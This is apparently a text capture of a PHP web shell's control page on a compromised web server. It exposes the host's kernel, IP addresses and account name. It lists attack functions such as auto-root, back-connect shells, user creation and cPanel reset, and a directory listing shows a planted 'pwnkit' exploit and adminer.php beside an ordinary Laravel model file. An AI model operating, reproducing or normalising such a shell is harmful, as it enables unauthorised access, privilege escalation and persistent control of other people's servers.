Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
demo2 /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Baja.php
1
KB
-rw-r--r--
Cliente.php
473
B
-rw-r--r--
Compra.php
919
B
-rw-r--r--
Delivery.php
696
B
-rw-r--r--
DetalleCompra.php
620
B
-rw-r--r--
DetalleCredito.php
713
B
-rw-r--r--
DetalleDelivery.php
610
B
-rw-r--r--
DetalleGuiaRemision.php
589
B
-rw-r--r--
DetalleProforma.php
610
B
-rw-r--r--
DetalleResumen.php
705
B
-rw-r--r--
DetalleTraslado.php
573
B
-rw-r--r--
DetalleVenta.php
611
B
-rw-r--r--
Egreso.php
602
B
-rw-r--r--
Empresa.php
889
B
-rw-r--r--
GuiaRemision.php
1.27
KB
-rw-r--r--
Local.php
538
B
-rw-r--r--
MediosPago.php
271
B
-rw-r--r--
Nota.php
940
B
-rw-r--r--
Producto.php
814
B
-rw-r--r--
ProductoLocal.php
544
B
-rw-r--r--
Proforma.php
646
B
-rw-r--r--
Proveedor.php
492
B
-rw-r--r--
Resumen.php
641
B
-rw-r--r--
Retiro.php
695
B
-rw-r--r--
Rol.php
240
B
-rw-r--r--
SujetoDetraccion.php
309
B
-rw-r--r--
TipoComprobante.php
300
B
-rw-r--r--
TipoDocumento.php
283
B
-rw-r--r--
TipoLocal.php
284
B
-rw-r--r--
TipoPresentacion.php
317
B
-rw-r--r--
Traslado.php
708
B
-rw-r--r--
UnidadMedida.php
316
B
-rw-r--r--
Usuario.php
843
B
-rw-r--r--
Venta.php
1.62
KB
-rw-r--r--
VentasCredito.php
478
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Delivery.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; class Delivery extends Model { protected $table = 'delivery'; protected $primaryKey = 'id_delivery'; protected $fillable = [ 'id_delivery', 'id_local', 'id_usuario', 'nombre', 'numero_documento', 'direccion', 'telefono', 'email', 'latitud', 'longitud', 'fecha_emision', 'total', 'metodo_pago', 'estado_pago', 'observacion', 'estado_delivery', 'estado' ]; public function usuario() { return $this->belongsTo('App\Models\Usuario', 'id_usuario'); } public function local() { return $this->belongsTo('App\Models\Local', 'id_local'); } }
Close